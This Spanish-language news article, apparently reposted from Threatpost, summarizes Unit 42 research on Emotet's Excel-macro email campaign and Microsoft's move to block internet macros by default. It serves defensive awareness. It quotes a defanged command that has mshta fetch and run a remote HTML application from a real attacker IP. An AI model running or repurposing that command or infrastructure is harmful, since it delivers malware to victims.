Una campaña de correo electrónico malicioso en curso que incluye archivos cargados de macros y múltiples capas de ofuscación ha estado activa desde finales de diciembre.
El infame malware Emotet ha cambiado de táctica una vez más, en una campaña de correo electrónico que se propaga a través de archivos maliciosos de Excel, según descubrieron los investigadores.
Los investigadores de la Unidad 42 de Palo Alto Networks han observado un nuevo enfoque de infección para el malware de alto volumen, que se sabe que modifica y cambia sus vectores de ataque para evitar la detección y poder continuar con su nefasto trabajo, escribieron en un informe publicado en línea . Martes.
“La nueva cadena de ataque de Emotet revela múltiples etapas con diferentes tipos de archivos y guiones ofuscados antes de llegar a la carga útil final de Emotet”, escribieron los investigadores de la Unidad 42 Saqib Khanzada, Tyler Halfpop, Micah Yates y Brad Duncan.
El nuevo vector de ataque, descubierto el 21 de diciembre y aún activo, entrega un archivo de Excel que incluye una macro ofuscada de Excel 4.0 a través de correos electrónicos de ingeniería social.
“Cuando se activa la macro, descarga y ejecuta una aplicación HTML que descarga dos etapas de PowerShell para recuperar y ejecutar la carga útil final de Emotet”, escribieron los investigadores.
El malware que no morirá
Emotet comenzó su vida como un troyano bancario en 2014 y ha evolucionado continuamente para convertirse en un mecanismo de entrega de amenazas de servicio completo, en un momento existió como una botnet que tenía más de 1,5 millones de máquinas bajo su control, según Check Point Software. Las consecuencias típicas de las infecciones de TrickBot son la apropiación de cuentas bancarias, el fraude electrónico de alto valor y los ataques de ransomware.
De hecho, al final de su apogeo original, el daño estimado de Emotet fue de alrededor de $ 2.5 mil millones de dólares, dijeron los investigadores.
Luego, Emotet pareció quedar fuera de servicio por un desmantelamiento colaborativo de las fuerzas del orden internacional de una red de cientos de servidores botnet que respaldan el sistema en enero de 2021. Sin embargo, resurgió en noviembre pasado gracias a TrickBot , un socio en el crimen frecuente. — y ahora sigue siendo una amenaza.
Desde su regreso, Emotet ha utilizado el secuestro de hilos y otros tipos de tácticas como parte de nuevos métodos de ataque.
“Esta técnica genera respuestas falsas basadas en correos electrónicos legítimos robados de clientes de correo de hosts de Windows previamente infectados con Emotet”, escribieron los investigadores de Unit 42. “La botnet utiliza estos datos de correo electrónico robados para crear respuestas falsas que se hacen pasar por los remitentes originales”.
Los ejemplos de este método incluyeron el uso de enlaces para instalar un paquete de instalador de aplicaciones de Adobe Windows falso que se informó en diciembre, escribieron los investigadores.
Uso de macros de Excel
El nuevo método de infección de Emotet usando macros de Excel también tiene varias variaciones, según Unit 42.
"En algunos casos, Emotet utiliza un archivo .ZIP protegido con contraseña como archivo adjunto a su correo electrónico", explicaron los investigadores. “En otros casos, Emotet usa una hoja de cálculo de Excel directamente adjunta al correo electrónico”.
Los investigadores describieron un correo electrónico enviado por la botnet Emotet el 27 de enero que utiliza un hilo de correo electrónico robado de junio de 2021. El correo electrónico utiliza un señuelo que anuncia un "nuevo anuncio" a un "proveedor valioso" y contiene un archivo .ZIP encriptado en un intento para eludir los sistemas de seguridad, escribieron los investigadores. También incluye la contraseña del archivo .ZIP en el correo electrónico, para que la víctima pueda extraer su contenido.
“El archivo .ZIP encriptado contiene un solo documento de Excel con macros de Excel 4.0”, escribieron los investigadores. “Estas macros son una característica antigua de Excel que los actores maliciosos abusan con frecuencia. La víctima debe habilitar las macros en un host de Windows vulnerable antes de que se active el contenido malicioso”.
Una vez hecho esto, el código de macro ejecuta cmd.exe para ejecutar mshta.exe, con un argumento para recuperar y ejecutar una aplicación HTML remota que descarga y ejecuta código PowerShell adicional, escribieron los investigadores.
“El código utiliza la ofuscación hexadecimal y de caracteres para intentar eludir las medidas de detección estática”, explicaron. "La cadena de comando desofuscada que se ejecuta es: cmd /c mshta hxxp://91.240.118[.]168/se/s.html".
El script de PowerShell ofuscado inicial se conecta a hxxp://91.240.118[.]168/se/s.png, una URL que devuelve un script basado en texto para un conjunto de código de PowerShell de segunda etapa diseñado para recuperar un binario de Emotet.
"Este código de PowerShell de segunda etapa... contiene 14 URL para recuperar el binario de Emotet", escribieron los investigadores. “El script intenta cada URL hasta que un binario de Emotet se descarga con éxito”.
Tener varias URL en su cadena de ataque tiene como objetivo hacerla más resistente en caso de que se elimine una de las URL, dijeron los investigadores. La etapa final de la cadena de ataque ocurre cuando Emotet .DLL carga un PE encriptado desde su sección de recursos, agregaron.
Microsoft bloqueará macros por defecto
La semana pasada, Microsoft anunció un plan para deshabilitar todas las macros de forma predeterminada en algunas aplicaciones, reconociendo que el mecanismo es una de las formas más populares del mundo para distribuir malware.
“Para la protección de nuestros clientes, debemos dificultar la habilitación de macros en archivos obtenidos de Internet”, señaló el gigante informático. "Las macros de VBA obtenidas de Internet ahora se bloquearán de forma predeterminada".
Tres aplicaciones populares de Office, Word, Excel y PowerPoint, además de Access y Visio, se ven afectadas por el cambio.
“Para las macros en archivos obtenidos de Internet, los usuarios ya no podrán habilitar el contenido con solo hacer clic en un botón”, dijo Microsoft. “El valor predeterminado es más seguro y se espera que mantenga a más usuarios seguros, incluidos los usuarios domésticos y los trabajadores de la información en las organizaciones administradas”.
A partir de fines de abril, en lugar de un botón para "habilitar macros", los usuarios recibirán un botón "aprender más" que los llevará a información adicional antes de que puedan activar macros dentro de un documento.
Fuente: https://threatpost.com/
No olvides Compartir...
Siguenos en twitter: @disoftin - @fredyavila - @PaolaMRincon
0 Comentarios